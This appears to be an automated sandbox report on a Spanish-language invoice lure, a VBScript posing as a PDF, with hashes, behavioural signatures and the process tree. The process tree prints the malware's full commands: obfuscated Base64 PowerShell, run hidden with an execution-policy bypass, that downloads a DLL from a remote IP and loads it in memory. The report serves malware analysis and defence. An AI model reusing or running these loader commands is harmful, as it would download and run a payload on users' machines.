Analysis
-
max time kernel
42s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
01-07-2022 20:31
Static task
static1
Behavioral task
behavioral1
Sample
DETALLES FACTUTACION VENCIDA.PDF.vbs
Resource
win7-20220414-en
General
-
Target
DETALLES FACTUTACION VENCIDA.PDF.vbs
-
Size
208KB
-
MD5
c2a54f061aba21192c2366e5aff19ef3
-
SHA1
0e35261883e5bbe9df33797d230f7180309b083e
-
SHA256
80d4b70c3b8c11f6c761e105ce14f61e191a89cc8bd81ee86fb741f48bfdb7ff
-
SHA512
59ebcecb57800046d977e2fdd733d29e41d3ca14feab25b730ceeee8e6f4fa5e40e72eff2c3a629c8d9af298dbad1e18c1a34d87cef76e908f754f3221b558db
Malware Config
Extracted
http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1632 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1976 powershell.exe 1632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1228 wrote to memory of 1976 1228 WScript.exe powershell.exe PID 1228 wrote to memory of 1976 1228 WScript.exe powershell.exe PID 1228 wrote to memory of 1976 1228 WScript.exe powershell.exe PID 1976 wrote to memory of 1632 1976 powershell.exe powershell.exe PID 1976 wrote to memory of 1632 1976 powershell.exe powershell.exe PID 1976 wrote to memory of 1632 1976 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEMAbwBwAHkA⚔⚔⚔wB0AGEAcgB0AH⚔⚔⚔AcABSAG8AZABhAC⚔⚔⚔AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBTAHkAcwB0AG⚔⚔⚔AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMwAuADEAMAA2AC4AMQA5ADEALgAxADAANQAvAGQAbABsAC8AZABsAGwAJQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQALgB0AHgAdAAnACkAKQA7AFsA⚔⚔⚔wB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⚔⚔⚔AcgByAG⚔⚔⚔AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⚔⚔⚔AKAAnAHgASwB2AEsAawB1AE4AWgAuAF⚔⚔⚔ARwBsAHkAbQB6AF⚔⚔⚔AZwAnACkALgBHAG⚔⚔⚔AdABNAG⚔⚔⚔AdABoAG8AZAAoACcAVQBEAHMA⚔⚔⚔wBpAEQAYgBiACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⚔⚔⚔AbABsACwAIABbAG8AYgBqAG⚔⚔⚔AYwB0AFsAXQBdACAAKAAnADEAMAAzADAAMAA5ADAAZgA0AGMANAA4AC0AYwAzADIAOAAtADEAMQAxADQALQA3ADEAYQA3AC0AYwA0ADYANgAxAGYAOAA0AD0AbgBlAGsAbwB0ACYAYQBpAGQAZQBtAD0AdABsAGEAPwB0AHgAdAAuAE8AVABYAE⚔⚔⚔AVAAvAG8ALwBtAG8AYwAuAHQAbwBwAHMAcABwAGEALgB0AG4AZQBwAG4AaQB0AHMAZQB0AC8AYgAvADAAdgAvAG0AbwBjAC4AcwBpAHAAYQBlAGwAZwBvAG8AZwAuAG⚔⚔⚔AZwBhAHIAbwB0AHMAZQBzAGEAYgBlAHIAaQBmAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⚔⚔⚔gBvAGQAYQBDAG8AcAB5ACAALAAgACcAbgBvAHQAZQAnACAAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('⚔⚔⚔','U') ) );$OWjuxD = $OWjuxD.replace('%CopyStartupRoda%', 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('1030090f4c48-c328-1114-71a7-c4661f84=nekot&aidem=tla?txt.OTXET/o/moc.topsppa.tnepnitset/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'note' ))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5f12f97f3591dc41abb731cf8f3ca52dd
SHA1758f2c56039a64d2896d3eb3578fe02a2dc8ae93
SHA25643b69e288b5309cd37216bc5036d065ad7f0725067b937899d409e0527aa263a
SHA5126d5dff4feb63379069abdd12c62973fa3da02986fa9c0b8354a2e4f9b2d3480d421720b7e85ccfd8f0b2afdbfb56843d4703e96576705d1776f24509bfe97f4f
-
memory/1228-54-0x000007FEFB871000-0x000007FEFB873000-memory.dmpFilesize
8KB
-
memory/1632-68-0x000000001B730000-0x000000001BA2F000-memory.dmpFilesize
3.0MB
-
memory/1632-65-0x000007FEF3220000-0x000007FEF3D7D000-memory.dmpFilesize
11.4MB
-
memory/1632-71-0x00000000027BB000-0x00000000027DA000-memory.dmpFilesize
124KB
-
memory/1632-70-0x00000000027B4000-0x00000000027B7000-memory.dmpFilesize
12KB
-
memory/1632-61-0x0000000000000000-mapping.dmp
-
memory/1632-69-0x00000000027BB000-0x00000000027DA000-memory.dmpFilesize
124KB
-
memory/1632-64-0x000007FEF3D80000-0x000007FEF47A3000-memory.dmpFilesize
10.1MB
-
memory/1632-67-0x00000000027B4000-0x00000000027B7000-memory.dmpFilesize
12KB
-
memory/1976-66-0x00000000024EB000-0x000000000250A000-memory.dmpFilesize
124KB
-
memory/1976-58-0x000007FEF3220000-0x000007FEF3D7D000-memory.dmpFilesize
11.4MB
-
memory/1976-55-0x0000000000000000-mapping.dmp
-
memory/1976-57-0x000007FEF3D80000-0x000007FEF47A3000-memory.dmpFilesize
10.1MB
-
memory/1976-60-0x000000001B880000-0x000000001BB7F000-memory.dmpFilesize
3.0MB
-
memory/1976-59-0x00000000024E4000-0x00000000024E7000-memory.dmpFilesize
12KB
-
memory/1976-72-0x00000000024E4000-0x00000000024E7000-memory.dmpFilesize
12KB
-
memory/1976-73-0x00000000024EB000-0x000000000250A000-memory.dmpFilesize
124KB